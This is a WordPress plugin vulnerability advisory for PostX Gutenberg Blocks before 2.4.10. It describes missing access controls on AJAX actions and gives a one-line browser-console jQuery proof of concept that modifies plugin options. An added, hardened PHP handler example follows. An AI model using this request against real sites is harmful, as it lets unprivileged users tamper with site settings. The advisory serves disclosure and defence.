WordPress Plugin Vulnerabilities
PostX Gutenberg Blocks for Post Grid < 2.4.10 - Missing Access Controls
Description
The plugin performs incorrect checks before allowing any logged-in user to perform some AJAX-based requests, allowing any user to modify, delete or add ultp_options values.
Proof of Concept
You can run this from a browser's JavaScript console:
jQuery.post(ajaxurl,{action:"ultp_addon",addon:"ultp_templates",value:"false",wpnonce:"a"})
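For comparison, an AJAX handler that would reject the request above unless it carries a valid nonce and comes from an administrator. This is an added example, not PostX's own code or its actual fix: the action, nonce and option names prefixed `example_` are hypothetical, and only the request field names (addon, value, wpnonce) mirror the proof of concept.

```php
<?php
/**
 * Plugin Name: Example add-on toggle (hardened AJAX handler)
 * Every name prefixed "example_" is hypothetical; field names mirror the PoC.
 */

// wp_ajax_{action} fires for every logged-in user, subscribers included,
// so registering the hook is not an authorization check by itself.
add_action( 'wp_ajax_example_addon', 'example_addon_toggle' );

function example_addon_toggle() {
	// 1. CSRF: the 'wpnonce' field must have been minted for this action.
	//    With $stop = false the function returns instead of dying, so the
	//    result has to be tested explicitly.
	if ( ! check_ajax_referer( 'example_addon_nonce', 'wpnonce', false ) ) {
		wp_send_json_error( array( 'message' => 'Invalid nonce' ), 403 );
	}

	// 2. Authorization: a nonce proves intent, not privilege.
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
	}

	// 3. Input: only known add-on keys may be written (constructed list).
	$allowed = array( 'example_templates', 'example_builder' );
	$addon   = isset( $_POST['addon'] ) ? sanitize_key( wp_unslash( $_POST['addon'] ) ) : '';
	if ( ! in_array( $addon, $allowed, true ) ) {
		wp_send_json_error( array( 'message' => 'Unknown add-on' ), 400 );
	}

	// The PoC sends value as the string "false"; map it to a strict boolean.
	$raw   = isset( $_POST['value'] ) ? sanitize_text_field( wp_unslash( $_POST['value'] ) ) : '';
	$value = ( 'true' === $raw );

	$options = get_option( 'example_options', array() );
	if ( ! is_array( $options ) ) {
		$options = array();
	}
	$options[ $addon ] = $value;
	update_option( 'example_options', $options );

	wp_send_json_success( array( 'addon' => $addon, 'enabled' => $value ) );
}
```

`wp_send_json_error()` ends the request, so each failed check stops execution before the option is touched.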
Affects Plugins
References
CVE
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-08-17 (about 2 years ago)
Added
2021-08-26 (about 2 years ago)
Last Updated
2023-01-27 (about 1 year ago)